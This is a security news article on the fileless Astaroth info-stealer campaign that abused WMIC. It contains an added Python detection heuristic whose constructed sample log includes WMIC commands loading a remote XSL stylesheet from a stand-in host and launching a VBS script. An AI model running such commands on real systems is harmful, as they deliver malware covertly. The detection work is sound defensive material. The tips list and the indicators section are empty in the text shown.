The Microsoft Defender ATP Research Team released a report covering a malware campaign that dropped the Astaroth trojan into the memory of infected computers. This particular campaign was notable in its distribution method and complex attack chain. It used fileless distribution techniques to hide its activities from security solutions, and abused different legitimate Windows software features to spread quietly.
Discovered in 2017, Astaroth is known as an information stealer. It is capable of taking sensitive information from an affected user — account credentials, keystrokes, and other data — and sending it to the attacker.
During a standard telemetry review, a researcher from the Microsoft Defender ATP Research Team, Andrea Lelli, noted a spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script, which indicated a fileless technique being used. Upon further investigation, Lelli discovered the Astaroth campaign where attackers were attempting to install the malware directly in the memory of victim devices.
The malware campaign runs only legitimate Windows tools, each of which downloads additional code and hands it to the next stage. The whole chain executes in memory without writing any file to disk, which is why it is called a “fileless execution.” That fileless nature makes the campaign hard for traditional antivirus tools to detect, although more advanced security solutions are able to defend against such a threat.
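The spike that led to this discovery was visible in process-creation telemetry: WMIC being launched to run a script rather than for routine queries. The following Python is an added example (not Trend Micro's or Microsoft's code) of the kind of heuristic a detection team could run over such telemetry. It assumes a constructed, simplified log format with `parent=`, `image=` and `cmd=` fields; real Sysmon or EDR events have their own schema, and the sample lines, hostnames and paths below are all constructed.

```python
"""Heuristic detection of script execution through WMIC in process-creation logs.

Added example; the log format, field names and sample events are constructed
assumptions, not a real product schema.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample telemetry: routine WMIC queries, two suspicious WMIC launches,
# and one unrelated process so the filter on image name is exercised.
SAMPLE_LOG = [
    'parent=cmd.exe image=wmic.exe cmd=wmic os get caption',
    'parent=explorer.exe image=wmic.exe cmd=wmic process list brief',
    'parent=cmd.exe image=wmic.exe cmd=wmic computersystem get model',
    'parent=cmd.exe image=wmic.exe cmd=wmic os get /format:"https://example.invalid/style.xsl"',
    'parent=mshta.exe image=wmic.exe cmd=wmic process call create "cscript.exe C:\\Users\\Public\\run.vbs"',
    'parent=cmd.exe image=notepad.exe cmd=notepad.exe C:\\temp\\notes.txt',
]

LINE_RE = re.compile(r"^parent=(?P<parent>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Script and stylesheet extensions that a system query tool has no business loading.
SCRIPT_EXT_RE = re.compile(r"\.(xsl|js|jse|vbs|vbe|wsf|hta)\b", re.IGNORECASE)
# Script/HTML hosts: an administrator rarely launches WMIC from one of these.
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Finding:
    line_no: int            # 1-based position in the input log
    reasons: Tuple[str, ...]
    cmd: str


def parse_event(line: str):
    """Return (parent, image, cmd) for a well-formed line, or None otherwise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("parent"), m.group("image"), m.group("cmd")


def score_event(parent: str, image: str, cmd: str) -> List[str]:
    """List the signals that make a WMIC launch look like script execution.

    Non-WMIC events get an empty list; routine queries also get an empty list.
    """
    reasons: List[str] = []
    if image.lower() != "wmic.exe":
        return reasons
    if URL_RE.search(cmd):
        reasons.append("remote URL in WMIC command line")
    if SCRIPT_EXT_RE.search(cmd):
        reasons.append("script/stylesheet file referenced")
    if parent.lower() in SCRIPT_HOST_PARENTS:
        reasons.append(f"spawned by script host {parent}")
    return reasons


def scan_log(lines: List[str]) -> List[Finding]:
    """Run the heuristic over every line and keep only events with at least one signal."""
    findings: List[Finding] = []
    for idx, line in enumerate(lines, start=1):
        parsed = parse_event(line)
        if parsed is None:
            continue  # malformed line; a real pipeline would count these separately
        parent, image, cmd = parsed
        reasons = score_event(parent, image, cmd)
        if reasons:
            findings.append(Finding(idx, tuple(reasons), cmd))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {'; '.join(f.reasons)}\n    {f.cmd}")
```

Only the two constructed suspicious lines are reported; the ordinary inventory queries pass through silently, which is the property that keeps a rule like this from drowning analysts in noise. A production version would key the signals to whatever fields the real telemetry provides and add an allow-list for known administrative scripts.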
[READ: Security 101: Defending Against Fileless Malware]
Lelli notes that this malware campaign completely “lives off the land,” given that all files run during the attack chain are system tools. By abusing legitimate tools already present on the target system, it tries to disguise its actions as regular activity.
This use of fileless techniques is not new. In fact, in 2018 we saw an uptick in fileless events, and cybercriminals continue to use fileless techniques to update old malware.
But while fileless threats may not be as visible as more traditional ones, they leave telltale signs that can be detected by IT and security teams. Here are some ways enterprises can stay ahead of fileless threats:
To protect against fileless threats that use spam emails as vectors, enterprises can use the Trend Micro endpoint solutions Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions protect users and businesses from threats by detecting malicious files and spammed messages, and block all related malicious URLs.
Indicators of Compromise